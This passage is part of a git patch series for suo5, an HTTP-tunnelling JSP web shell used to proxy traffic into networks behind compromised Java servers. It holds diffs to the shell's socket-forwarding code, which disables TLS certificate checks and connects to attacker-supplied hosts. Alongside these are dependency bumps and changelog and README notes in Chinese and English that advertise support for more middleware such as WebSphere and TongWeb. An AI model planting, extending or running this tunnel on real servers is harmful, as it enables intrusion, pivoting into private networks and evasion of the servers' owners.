System.out.println("socket error " + e.toString()); // e.printStackTrace(); } finally { if (sc != null) { @@ -434,7 +449,7 @@ private void processDataUnary(HttpServletRequest request, HttpServletResponse re conn.disconnect(); } respOutStream.close(); - ctx.removeAttribute(clientId); + this.remove(clientId); } } @@ -499,9 +514,9 @@ HttpURLConnection redirect(HttpServletRequest request, HashMap dataMap, String r // ref: https://github.com/L-codes/Neo-reGeorg/blob/master/templates/NeoreGeorg.java if (HttpsURLConnection.class.isInstance(conn)) { ((HttpsURLConnection) conn).setHostnameVerifier(this); - SSLContext ctx = SSLContext.getInstance("SSL"); - ctx.init(null, new TrustManager[]{this}, null); - ((HttpsURLConnection) conn).setSSLSocketFactory(ctx.getSocketFactory()); + SSLContext sslCtx = SSLContext.getInstance("SSL"); + sslCtx.init(null, new TrustManager[]{this}, null); + ((HttpsURLConnection) conn).setSSLSocketFactory(sslCtx.getSocketFactory()); } Enumeration headers = request.getHeaderNames(); @@ -531,4 +546,4 @@ public void checkServerTrusted(X509Certificate[] chain, String authType) throws public X509Certificate[] getAcceptedIssuers() { return new X509Certificate[0]; } -} +} \ No newline at end of file diff --git a/go.sum b/go.sum index de8eea2..57d450d 100644 --- a/go.sum +++ b/go.sum @@ -31,14 +31,10 @@ github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINE github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= github.com/projectdiscovery/retryablehttp-go v1.0.2/go.mod h1:dx//aY9V247qHdsRf0vdWHTBZuBQ2vm6Dq5dagxrDYI= -github.com/projectdiscovery/retryablehttp-go v1.0.14 h1:PJaHQtHWE00xrmryZwhtma2b72GbkfA9gJM0yIR9ENY= -github.com/projectdiscovery/retryablehttp-go v1.0.14/go.mod h1:L5HwtGSvc0E3dNVtVqPACWOmr21Bbop2ZhpbCPYEeYU= github.com/projectdiscovery/retryablehttp-go v1.0.16 h1:xrEK9VVkLf0eN4bYOTc2Pg0qRqz47g8T823vqpCIsl8= github.com/projectdiscovery/retryablehttp-go v1.0.16/go.mod h1:9m76To4lNgBtVfqADzLxZg1wWajv6y/uYMWCOs1Olo8= github.com/projectdiscovery/stringsutil v0.0.0-20210830151154-f567170afdd9 h1:xbL1/7h0k6HE3RzPdYk9W/8pUxESrGWewTaZdIB5Pes= github.com/projectdiscovery/stringsutil v0.0.0-20210830151154-f567170afdd9/go.mod h1:oTRc18WBv9t6BpaN9XBY+QmG28PUpsyDzRht56Qf49I= -github.com/projectdiscovery/utils v0.0.19 h1:5m70xVhBq86h5KsOMVWSO0H+PTmkwlOGAekWcHsaTxI= -github.com/projectdiscovery/utils v0.0.19/go.mod h1:Cu216AlQ7rAYa8aDBqB2OgNfu5p24Uj+tG9RxV8Wbfs= github.com/projectdiscovery/utils v0.0.31 h1:IgwzYpqLLYSA8aMq5JCoErH8Fqo/bsl78+Yxj5uX1aY= github.com/projectdiscovery/utils v0.0.31/go.mod h1:CmTHhNchGCzuxED52xx8LuzlP144LOgoNCBQ8WTZ0ks= github.com/russross/blackfriday/v2 v2.1.0 h1:JIOH55/0cWyOuilr9/qlrm0BSXldqnqwMsf35Ld67mk= @@ -51,8 +47,7 @@ github.com/stretchr/objx v0.5.0/go.mod h1:Yh+to48EsGEfYuaHDzXPcE3xhTkx73EhmCGUpE github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= github.com/stretchr/testify v1.8.0/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU= -github.com/stretchr/testify v1.8.1 h1:w7B6lhMri9wdJUVmEZPGGhZzrYTPvgJArz7wNPgYKsk= -github.com/stretchr/testify v1.8.1/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= +github.com/stretchr/testify v1.8.2 h1:+h33VjcLVPDHtOdpUCuF+7gSuG3yGIftsP1YvFihtJ8= github.com/stretchr/testify v1.8.2/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= github.com/urfave/cli/v2 v2.25.1 h1:zw8dSP7ghX0Gmm8vugrs6q9Ku0wzweqPyshy+syu9Gw= github.com/urfave/cli/v2 v2.25.1/go.mod h1:GHupkWPMM0M/sj1a2b4wUrWBPzazNrIjouW6fmdJLxc= @@ -62,14 +57,11 @@ github.com/zema1/rawhttp v0.0.0-20221102031338-134c5669760c h1:vSrYC77zzwoHrtOyw github.com/zema1/rawhttp v0.0.0-20221102031338-134c5669760c/go.mod h1:4Jij1woZQptA1rqj+VhIokbXKmek4AJw7ze4GIru8mY= golang.org/x/net v0.0.0-20210521195947-fe42d452be8f/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/net v0.0.0-20211216030914-fe4d6282115f/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= -golang.org/x/net v0.9.0 h1:aWJ/m6xSmxWBx+V0XRHTlrYrPG56jKsLdTFmsSsCzOM= -golang.org/x/net v0.9.0/go.mod h1:d48xBJpPfHeWQsugry2m+kC02ZBRGRgulfHnEXEuWns= golang.org/x/net v0.10.0 h1:X2//UzNDwYmtCLn7To6G58Wr6f5ahEAQgKNzv9Y951M= golang.org/x/net v0.10.0/go.mod h1:0qNGK6F8kojg2nk9dLZ2mShWaEBan6FAoqfSigmmuDg= golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.7.0 h1:3jlCCIQZPdOYu1h8BkNvLz8Kgwtae2cagcG/VamtZRU= -golang.org/x/sys v0.7.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.8.0 h1:EBmGv8NaZBZTWvrbjNoL6HVt+IVy3QDQpJs7VRIw3tU= golang.org/x/sys v0.8.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= From df9b36fa2e6b79868f6cbfeaddf67a5031cddd09 Mon Sep 17 00:00:00 2001 From: zema1 Date: Wed, 17 May 2023 20:55:25 +0800 Subject: [PATCH 08/11] fix: getLocalPort undefined --- assets/suo5.jsp | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/assets/suo5.jsp b/assets/suo5.jsp index ad006be..3e0b5ab 100644 --- a/assets/suo5.jsp +++ b/assets/suo5.jsp @@ -230,7 +230,11 @@ String host = new String((byte[]) dataMap.get("h")); int port = Integer.parseInt(new String((byte[]) dataMap.get("p"))); if (port == 0) { - port = request.getLocalPort(); + try { + port = (Integer) request.getClass().getMethod("getLocalPort", new Class[]{}).invoke(request, new Object[]{}); + } catch (Exception e) { + port = (Integer) request.getClass().getMethod("getServerPort", new Class[]{}).invoke(request, new Object[]{}); + } } sc = new Socket(); sc.connect(new InetSocketAddress(host, port), 5000); @@ -380,7 +384,11 @@ String host = new String((byte[]) dataMap.get("h")); int port = Integer.parseInt(new String((byte[]) dataMap.get("p"))); if (port == 0) { - port = request.getLocalPort(); + try { + port = (Integer) request.getClass().getMethod("getLocalPort", new Class[]{}).invoke(request, new Object[]{}); + } catch (Exception e) { + port = (Integer) request.getClass().getMethod("getServerPort", new Class[]{}).invoke(request, new Object[]{}); + } } InputStream readFrom; From 799dd33a7296469fb8a0e8a23e375651f50b0950 Mon Sep 17 00:00:00 2001 From: zema1 Date: Wed, 17 May 2023 21:10:59 +0800 Subject: [PATCH 09/11] fix: Cannot convert Integer to int --- assets/suo5.jsp | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/assets/suo5.jsp b/assets/suo5.jsp index 3e0b5ab..9702f64 100644 --- a/assets/suo5.jsp +++ b/assets/suo5.jsp @@ -231,9 +231,10 @@ int port = Integer.parseInt(new String((byte[]) dataMap.get("p"))); if (port == 0) { try { - port = (Integer) request.getClass().getMethod("getLocalPort", new Class[]{}).invoke(request, new Object[]{}); + // Cannot convert Integer to int + port = ((Integer) request.getClass().getMethod("getLocalPort", new Class[]{}).invoke(request, new Object[]{})).intValue(); } catch (Exception e) { - port = (Integer) request.getClass().getMethod("getServerPort", new Class[]{}).invoke(request, new Object[]{}); + port = ((Integer) request.getClass().getMethod("getServerPort", new Class[]{}).invoke(request, new Object[]{})).intValue(); } } sc = new Socket(); @@ -385,9 +386,9 @@ int port = Integer.parseInt(new String((byte[]) dataMap.get("p"))); if (port == 0) { try { - port = (Integer) request.getClass().getMethod("getLocalPort", new Class[]{}).invoke(request, new Object[]{}); + port = ((Integer) request.getClass().getMethod("getLocalPort", new Class[]{}).invoke(request, new Object[]{})).intValue(); } catch (Exception e) { - port = (Integer) request.getClass().getMethod("getServerPort", new Class[]{}).invoke(request, new Object[]{}); + port = ((Integer) request.getClass().getMethod("getServerPort", new Class[]{}).invoke(request, new Object[]{})).intValue(); } } From 01914bad413d75aee9cb32788e619885abd9cf3c Mon Sep 17 00:00:00 2001 From: zema1 Date: Wed, 17 May 2023 21:12:43 +0800 Subject: [PATCH 10/11] feat: update README --- CHANGELOG.md | 20 +++++++++++++++++++- README.md | 9 +++++---- README_EN.md | 2 +- 3 files changed, 25 insertions(+), 6 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 502e4b0..655af8c 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,7 +1,25 @@ # 更新记录 +## [0.7.0] 2023-05-17 + +### 新增 + +- 增加 WebSphere 全版本支持 +- 增加东方通(TongWeb)支持, 部分旧版需要禁用 gzip 才行 +- 增加 `-no-gzip` 选项用于禁用响应中的 gzip 压缩 +- 上游代理 `-proxy` 增加 http(s) 的支持,不再仅限于 socks5 [#23](https://github.com/zema1/suo5/issues/23) [#25](https://github.com/zema1/suo5/issues/25) +- 去除 Session 相关依赖,优化 stream 读写相关的代码, 有效解决部分能连上没数据的问题 [#22](https://github.com/zema1/suo5/issues/22) +- 增加代理自测试逻辑,如果没有报错那么代理一定可用 +- 重写心跳包逻辑,如果 5s 内有数据读写,就不必发送心跳了 +- 基础连接测试的逻辑融合到全双工的判断中,减少一个测试请求 + +### 修复 +- 修复 GUI 版界面版本号错误的问题 +- 暂时禁用 darwin 的内存占用显示 + ## [0.6.0] - 2023-04-10 + ### 新增 - 降低 JDK 依赖到 Java 4, 目前兼容 Java 4 ~ Java 19 全版本 @@ -12,7 +30,7 @@ - Jetty 9,10,11 - 更换一个更圆润的图标, 感谢 [@savior-only](https://github.com/savior-only) -## 修复 +### 修复 - 修复 GUI 版本在高版本 Edge 下启动缓慢的问题 diff --git a/README.md b/README.md index 1cc2a48..d2e0ff2 100644 --- a/README.md +++ b/README.md @@ -26,8 +26,8 @@ - 同时支持全双工与半双工模式,传输性能接近 FRP - 支持在 Nginx 反向代理和负载均衡场景使用 - 完善的连接控制和并发管理,使用流畅丝滑 -- 支持 Tomcat Jetty Weblogic Resin 等主流中间件 -- 支持 Java4 ~ Java 19 全版本 +- 支持 Tomcat Jetty Weblogic WebSphere Resin 等主流中间件 +- 支持 Java4 ~ Java 19 全版本, 兼容性拉满 - 同时提供提供命令行和图形化界面 原理介绍 [https://koalr.me/posts/suo5-a-hign-performace-http-socks/](https://koalr.me/posts/suo5-a-hign-performace-http-socks/) @@ -55,7 +55,7 @@ USAGE: suo5 [global options] command [command options] [arguments...] VERSION: - v0.6.0 + v0.7.0 COMMANDS: help, h Shows a list of commands or help for one command @@ -72,9 +72,10 @@ GLOBAL OPTIONS: --header value, -H value [ --header value, -H value ] use extra header, ex -H 'Cookie: abc' --timeout value http request timeout in seconds (default: 10) --buf-size value set the request max body size (default: 327680) - --proxy value use upstream socks5 proxy + --proxy value use upstream proxy, support both socks5 and http(s), eg: socks5://127.0.0.1:7890 --debug, -d debug the traffic, print more details (default: false) --no-heartbeat, --nh disable heartbeat to the remote server which will send data every 5s (default: false) + --no-gzip, --ng disable gzip compression, which will improve compatibility with some old servers (default: false) --help, -h show help --version, -v print the version ``` diff --git a/README_EN.md b/README_EN.md index 5104f27..731cf77 100644 --- a/README_EN.md +++ b/README_EN.md @@ -26,7 +26,7 @@ Its key features include: - Simultaneously supports full duplex and half duplex modes, with transmission performance similar to FRP. - Supports usage in Nginx reverse proxy and load balancing scenarios. - Perfect connection control and concurrency management for smooth and seamless usage. -- Supports common middleware such as Tomcat, Jetty, Weblogic, Resin, etc. +- Supports common middleware such as Tomcat, Jetty, Weblogic, WebSphere, Resin, etc. - Supports all versions of Java4 to Java 19. - Provides both command line and graphical interfaces simultaneously. From d79b81090c78dd6e4f30e89f2f30734cd1bb32c0 Mon Sep 17 00:00:00 2001 From: zema1 Date: Wed, 17 May 2023 21:57:36 +0800 Subject: [PATCH 11/11] feat: bump version to 0.7.0 --- gui/frontend/src/Home.vue | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/gui/frontend/src/Home.vue b/gui/frontend/src/Home.vue index 0d70aba..5e4d609 100644 --- a/gui/frontend/src/Home.vue +++ b/gui/frontend/src/Home.vue @@ -76,7 +76,7 @@ 连接数: {{ status.connection_count }} CPU: {{ status.cpu_percent }} 内存: {{ status.memory_usage }} - 版本: 0.0.0 + 版本: 0.7.0